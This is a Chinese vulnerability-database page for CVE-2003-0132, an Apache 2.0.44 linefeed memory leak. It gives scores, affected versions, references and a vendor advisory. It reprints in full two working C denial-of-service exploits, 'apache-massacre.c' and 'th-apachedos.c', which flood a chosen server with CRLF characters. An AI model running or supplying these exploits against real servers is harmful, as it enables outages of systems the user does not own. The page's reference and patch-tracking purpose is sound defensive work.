CVE-2003-0132
CVSS5.0
发布时间 :2003-04-11 00:00:00
修订时间 :2016-10-17 22:29:57
NMCOEPS    

[原文]A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.


[CNNVD]Apache Web服务程序未明远程拒绝服务攻击漏洞(CNNVD-200304-076)

        
        Apache是一款流行的开放源代码httpd服务程序。
        Apache存在未明漏洞,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        目前没有详细漏洞细节。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:2.0.40Apache Software Foundation Apache HTTP Server 2.0.40
cpe:/a:apache:http_server:2.0.41Apache Software Foundation Apache HTTP Server 2.0.41
cpe:/a:apache:http_server:2.0.42Apache Software Foundation Apache HTTP Server 2.0.42
cpe:/a:apache:http_server:2.0.32Apache Software Foundation Apache HTTP Server 2.0.32
cpe:/a:apache:http_server:2.0.43Apache Software Foundation Apache HTTP Server 2.0.43
cpe:/a:apache:http_server:2.0.44Apache Software Foundation Apache HTTP Server 2.0.44
cpe:/a:apache:http_server:2.0.35Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:2.0.36Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:2.0.37Apache Software Foundation Apache HTTP Server 2.0.37
cpe:/a:apache:http_server:2.0.38Apache Software Foundation Apache HTTP Server 2.0.38
cpe:/a:apache:http_server:2.0.9Apache Software Foundation Apache HTTP Server 2.0.9a
cpe:/a:apache:http_server:2.0.28Apache Software Foundation Apache HTTP Server 2.0.28
cpe:/a:apache:http_server:2.0.39Apache Software Foundation Apache HTTP Server 2.0.39
cpe:/a:apache:http_server:2.0Apache Software Foundation Apache HTTP Server 2.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:156Apache Linefeed Allocation Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0132
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0132
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-076
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/mhonarc/security-announce/msg00028.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00028.html
http://marc.info/?l=bugtraq&m=104931360606484&w=2
(UNKNOWN)  BUGTRAQ  20030402 [ANNOUNCE] Apache 2.0.45 Released
http://marc.info/?l=bugtraq&m=104982175321731&w=2
(UNKNOWN)  BUGTRAQ  20030408 iDEFENSE Security Advisory 04.08.03: Denial of Service in Apache HTTP Server 2.x
http://marc.info/?l=bugtraq&m=104994239010517&w=2
(UNKNOWN)  BUGTRAQ  20030409 GLSA: apache (200304-01)
http://marc.info/?l=bugtraq&m=104994309010974&w=2
(UNKNOWN)  BUGTRAQ  20030408 Exploit Code Released for Apache 2.x Memory Leak
http://marc.info/?l=bugtraq&m=105001663120995&w=2
(UNKNOWN)  BUGTRAQ  20030410 working apache <= 2.0.44 DoS exploit for linux.
http://marc.info/?l=bugtraq&m=105013378320711&w=2
(UNKNOWN)  BUGTRAQ  20030411 PATCH: [CAN-2003-0132] Apache 2.0.44 Denial of Service
http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=205147
(UNKNOWN)  MISC  http://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=205147
http://www.idefense.com/advisory/04.08.03.txt
(UNKNOWN)  MISC  http://www.idefense.com/advisory/04.08.03.txt
http://www.kb.cert.org/vuls/id/206537
(UNKNOWN)  CERT-VN  VU#206537
http://www.redhat.com/support/errata/RHSA-2003-139.html
(UNKNOWN)  REDHAT  RHSA-2003:139
http://www.vupen.com/english/advisories/2009/1233
(UNKNOWN)  VUPEN  ADV-2009-1233

- 漏洞信息

Apache Web服务程序未明远程拒绝服务攻击漏洞
中危 其他
2003-04-11 00:00:00 2009-05-13 00:00:00
远程  
        
        Apache是一款流行的开放源代码httpd服务程序。
        Apache存在未明漏洞,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。
        目前没有详细漏洞细节。
        

- 公告与补丁

        厂商补丁:
        Apache Software Foundation
        --------------------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Apache Software Foundation Upgrade Apache httpd 2.0.45
        
        http://www.apache.org/dist/httpd/

- 漏洞信息 (9)

Apache HTTP Server 2.x Memory Leak Exploit (EDBID:9)
windows dos
2003-04-09 Verified
0 Matthew Murphy
N/A [点击下载]
/* apache-massacre.c
* Test code for Apache 2.x Memory Leak
* By Matthew Murphy
*
* DISCLAIMER: This exploit tool is provided only to test networks for a
* known vulnerability. Do not use this tool on systems you do not control,
* and do not use this tool on networks you do not own without appropriate
* consent from the network owner. You are responsible for any damage your
* use of the tool causes. In no event may the author of this tool be held
* responsible for damages relating to its use.
*
* As with most Apache exposures, the impacts vary between ports of the server:
*
* Non-Unix (Win32, Netware, OS/2): These ports are most adversely affected
* by this, as Apache's child process doesn't terminate normally unless the
* parent process stops. This means that leaks (and any performance loss) hang
* around until Apache is restarted.
*
* Unix/mpm_prefork: This MPM offers the most protection against successful
* exploitation, as its processes exit at the end of the request.
*
* Unix/other MPMs: These other MPMs utilize multiple Apache processes for 
* multiple Apache requests. Depending on the MPM in use and the traffic rates
* of the server, this may be used to the advantage of a potential attacker.
* If multiple different Apache processes are utilized, an attacker can spread
* the substantial leak between processes to dodge resource limits imposed on
* httpd's UID (usually nobody, www, or apache)
*
* Credit: iDEFENSE reported this issue to several security lists on April 8,
* 2003 following the Apache release announcement. Apache fixed the flaw about
* a month after the initial disclosure of this vulnerability. iDEFENSE credits
* the discovery of this vulnerability to an anonymous researcher.
*
* Happy Hunting!
*/

#ifndef _WIN32
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <fcntl.h>
#else
#include <windows.h>
#pragma comment(lib, "wsock32.lib")
#endif
#include <stdlib.h>
#include <stdio.h>

int sig_fired = 0;

#ifndef _WIN32
void sig_handler(int sig) {
#else
BOOL WINAPI sig_handler(DWORD dwCtrlType) {
#endif
sig_fired = 1;
#ifndef _WIN32
return;
#else
return TRUE;
#endif
}

int main(int argc, char *argv[]) {
SOCKET s;
struct sockaddr_in sin;
char buffer[1025];
struct hostent *he;
unsigned short iPort = 80;
int newlines = 100;
char *p;
char *p2;
int i;
#ifdef _WIN32
WSADATA wsa_prov;
#endif
printf("Apache Massacre v1.0\r\n");
printf("Exploit by Matthew Murphy\r\n");
printf("Vulnerability reported by iDEFENSE Labs\r\n\r\n");
#ifdef _WIN32
if (WSAStartup(0x0101, &wsa_prov)) {
perror("WSAStartup");
exit(1);
}
#endif
printf("Please enter the web server's host/IP: ");
fgets(&buffer[0], 1024, stdin);
he = gethostbyname(&buffer[0]);
if (!he) {
perror("gethostbyname");
exit(1);
}
sin.sin_addr.s_addr = *((unsigned long *)he->h_addr);
printf("Please enter the web server's port: ");
fgets(&buffer[0], 1024, stdin);
iPort = (unsigned short)atoi(&buffer[0]);
#ifndef _WIN32
#ifdef _SOLARIS
sigset(SIGINT, &sig_handler);
#else
signal(SIGINT, &sig_handler);
#endif
#else
SetConsoleCtrlHandler(&sig_handler, TRUE);
#endif
printf("How many newlines should be in each request [100]: ");
fgets(&buffer[0], 1024, stdin);
if (!buffer[0] == 0x0D && !buffer[0] == 0x0A) {
newlines = atoi(&buffer[0]);
}
p = malloc(newlines*2);
p2 = p;
for (i = 0; i < newlines; i++) {
*p2 = 0x0D;
p2++;
*p2 = 0x0A;
p2++;
}
newlines += newlines;
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
perror("socket");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(iPort);
if (connect(s, (const struct sockaddr *)&sin, sizeof(struct sockaddr_in))) {
perror("connect");
exit(1);
}
while (1) {
if (!send(s, (char *)p, newlines, 0) == newlines) {
perror("send");
exit(1);
}
if (sig_fired) {
printf("Terminating on SIGINT");
free(p);
#ifndef _WIN32
close(s);
#else
closesocket(s);
WSACleanup();
#endif
exit(0);
}
}
}


// milw0rm.com [2003-04-09]
		

- 漏洞信息 (11)

Apache <= 2.0.44 Linux Remote Denial of Service Exploit (EDBID:11)
linux dos
2003-04-11 Verified
0 Daniel Nystram
N/A [点击下载]
/******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* 
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* 
* 
* Daniel Nyström <exce@netwinder.nu> *
* 
* - www.telhack.tk - *
* 
******************************************************** th-apachedos.c ********/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>


int main(int argc, char *argv[])
{
int sockfd;
int count;
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache <= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s <Target> <Port>\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-> Starting...\n"); 
printf("->\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

for (count = 0; count < 8000000;) 
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he->h_addr);

printf("-> Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("->\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) < 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-> Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("->\n");

if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
close(sockfd);
} 


close(sockfd);

printf("-> Finished smoothly, check hosts apache...\n\n");
}

// milw0rm.com [2003-04-11]
		

- 漏洞信息 (F77174)

CA ARCserve Backup Apache HTTP Server (PacketStormID:F77174)
2009-05-01 00:00:00
Ken Williams  www3.ca.com
advisory,web,vulnerability
solaris,aix,hpux
CVE-2004-0747,CVE-2003-0132
[点击下载]

CA ARCserve Backup on Solaris, Tru64, HP-UX, and AIX contains multiple vulnerabilities in the Apache HTTP Server version as shipped with ARCserve Backup. CA has issued updates that contain version 2.0.63 of the Apache HTTP Server to address the vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: CA20090429-01: CA ARCserve Backup Apache HTTP Server 
Multiple Vulnerabilities


CA Advisory Reference: CA20090429-01


CA Advisory Date: 2009-04-29


Reported By:
Apache Software Foundation
David Endler of iDefense
Ulf Harnhammar for SITIC, Swedish IT Incident Centre


Impact: A remote attacker can exploit a buffer overflow to gain 
apache privileges, or cause a denial of service.


Summary: CA ARCserve Backup on Solaris, Tru64, HP-UX, and AIX 
contains multiple vulnerabilities in the Apache HTTP Server 
version as shipped with ARCserve Backup. CA has issued updates 
that contain version 2.0.63 of the Apache HTTP Server to address 
the vulnerabilities. Refer to the References section for a list of 
resolved issues by CVE identifier.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a Medium risk rating.


Affected Products:
CA ARCserve Backup r11.5 Solaris
CA ARCserve Backup r11.5 Tru64
CA ARCserve Backup r11.5 HP-UX
CA ARCserve Backup r11.5 AIX


Non-Affected Products:
CA ARCserve Backup r11.5 Windows
CA ARCserve Backup r11.5 Linux


Affected Platforms:
Solaris
Tru64
HP-UX
AIX


Status and Recommendation:
CA has issued the following patches to address the 
vulnerabilities.

CA ARCserve Backup r11.5 Solaris:
RO06786

CA ARCserve Backup r11.5 Tru64:
RO06788

CA ARCserve Backup r11.5 HP-UX:
RO06789

CA ARCserve Backup r11.5 AIX:
RO06791


How to determine if you are affected:

1. From the command line, run the following to print the version 
   of the Apache HTTP Server included with ARCserve Backup:

      $BAB_HOME/httpd/httpd -v

      Note: On HP-UX the shared library path needs to be modified 
            prior to running the httpd command:

      SHLIB_PATH=$SHLIB_PATH:$BAB_HOME/httpd/lib
      export SHLIB_PATH

2. If the displayed version is less than 2.0.63, then the 
   installation may be vulnerable.


Workaround: 
As a workaround solution, disable the Apache HTTP Server with the 
"stopgui" command. To re-enable the server, run "startgui".

Stopping the Apache HTTP Server will prevent the ARCserve user 
from performing GUI operations. Most of the operations provided by 
the GUI can be accomplished via the command line.

Alternatively, restrict remote network access to reduce exposure.


References (URLs may wrap):
CA Support:
https://support.ca.com/
CA20090429-01: Security Notice for CA ARCserve Backup Apache HTTP 
   Server
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=2051
47
Solution Document Reference APARs:
RO06786, RO06788, RO06789, RO06791
CA Security Response Blog posting:
CA20090429-01: CA ARCserve Backup Apache HTTP Server Multiple 
   Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2009/04/29.
asp
x
Reported By: 
Apache Software Foundation
David Endler of iDefense
Ulf Harnhammar for SITIC, Swedish IT Incident Centre
CVE References:
CVE-2004-0747
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0747
CVE-2003-0132
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0132
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release


Customers who require additional information should contact CA
Technical Support at https://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your 
findings to the CA Product Vulnerability Response Team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=1777
82


Regards,
Ken Williams, Director ; 0xE2941985
CA Product Vulnerability Response Team


CA, 1 CA Plaza, Islandia, NY 11749
	
Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2009 CA. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.10.0 (Build 500)
Charset: utf-8

wj8DBQFJ+gCReSWR3+KUGYURAml1AJ9btLnecbsFT5ExensYWKeO5xJqXQCfVqve
G3MQdYoTNzf/aIebT6Uw4ts=
=BSya
-----END PGP SIGNATURE-----
    

- 漏洞信息

9712
Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
Denial of Service
Loss of Availability Upgrade
Vendor Verified

- 漏洞描述

- 时间线

2003-04-02 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.0.45 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 7254
Yes No
2003-04-02 12:00:00 2009-05-01 12:36:00
This vulnerability was initially reported by the vendor.

- 受影响的程序版本

HP HP-UX Apache-Based Web Server 1.0.1 .01
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP HP-UX Apache-Based Web Server 1.0 .02.01
HP HP-UX Apache-Based Web Server 1.0 .01
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
HP Apache-Based Web Server 2.0.43 .04
HP Apache-Based Web Server 2.0.43 .00
- HP HP-UX 11.22
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
Computer Associates BrightStor ARCServe Backup for HP 11.1
Computer Associates ARCServe Backup for Tru64 11.5
Computer Associates ARCServe Backup for Solaris 11.5
Computer Associates ARCServe Backup for AIX 11.5
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apache Software Foundation Apache 2.0.44
Apache Software Foundation Apache 2.0.43
Apache Software Foundation Apache 2.0.42
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Apache 2.0.41
Apache Software Foundation Apache 2.0.40
+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0
+ Terra Soft Solutions Yellow Dog Linux 3.0
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.35
Apache Software Foundation Apache 2.0.32
Apache Software Foundation Apache 2.0.28
Apache Software Foundation Apache 2.0 a9
Apache Software Foundation Apache 2.0
HP HP-UX Apache-Based Web Server 1.0 .03.01
Apple Mac OS X Server 10.2.5
Apache Software Foundation Apache 2.0.45
- Apple Mac OS X 10.2.6
- Apple Mac OS X 10.2.5
- Apple Mac OS X 10.2.4
- Apple Mac OS X 10.2.3
- Apple Mac OS X 10.2.2
- Apple Mac OS X 10.2.1
- Apple Mac OS X 10.2
- Apple Mac OS X 10.1.5
- Apple Mac OS X 10.1.4
- Apple Mac OS X 10.1.3
- Apple Mac OS X 10.1.2
- Apple Mac OS X 10.1.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.3
- Apple Mac OS X 10.0.2
- Apple Mac OS X 10.0.1
- Apple Mac OS X 10.0
+ Conectiva Linux 9.0

- 不受影响的程序版本

HP HP-UX Apache-Based Web Server 1.0 .03.01
Apple Mac OS X Server 10.2.5
Apache Software Foundation Apache 2.0.45
- Apple Mac OS X 10.2.6
- Apple Mac OS X 10.2.5
- Apple Mac OS X 10.2.4
- Apple Mac OS X 10.2.3
- Apple Mac OS X 10.2.2
- Apple Mac OS X 10.2.1
- Apple Mac OS X 10.2
- Apple Mac OS X 10.1.5
- Apple Mac OS X 10.1.4
- Apple Mac OS X 10.1.3
- Apple Mac OS X 10.1.2
- Apple Mac OS X 10.1.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.1
- Apple Mac OS X 10.0.4
- Apple Mac OS X 10.0.3
- Apple Mac OS X 10.0.2
- Apple Mac OS X 10.0.1
- Apple Mac OS X 10.0
+ Conectiva Linux 9.0

- 漏洞讨论

Apache 2.0 series webservers are prone to a denial-of-service condition. This issue occurs because of the way that Apache handles excessive amounts of consecutive linefeed characters. The server may allocate large amounts of memory, resulting in a denial of service.

- 漏洞利用

The following exploits were provided:

- 解决方案

This vulnerability does not affect Apache 2.0.45. Users are advised to upgrade. The Apache Software Foundation has also provided a patch for Apache 2.0.44.


HP HP-UX Apache-Based Web Server 1.0 .01

HP HP-UX Apache-Based Web Server 1.0 .02.01

HP HP-UX Apache-Based Web Server 1.0.1 .01

Apache Software Foundation Apache 2.0

Apache Software Foundation Apache 2.0 a9

Apache Software Foundation Apache 2.0.28

Apache Software Foundation Apache 2.0.32

Apache Software Foundation Apache 2.0.35

Apache Software Foundation Apache 2.0.36

Apache Software Foundation Apache 2.0.37

Apache Software Foundation Apache 2.0.38

Apache Software Foundation Apache 2.0.39

Apache Software Foundation Apache 2.0.40

Apache Software Foundation Apache 2.0.41

Apache Software Foundation Apache 2.0.42

HP Apache-Based Web Server 2.0.43 .04

HP Apache-Based Web Server 2.0.43 .00

Apache Software Foundation Apache 2.0.43

Apache Software Foundation Apache 2.0.44

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站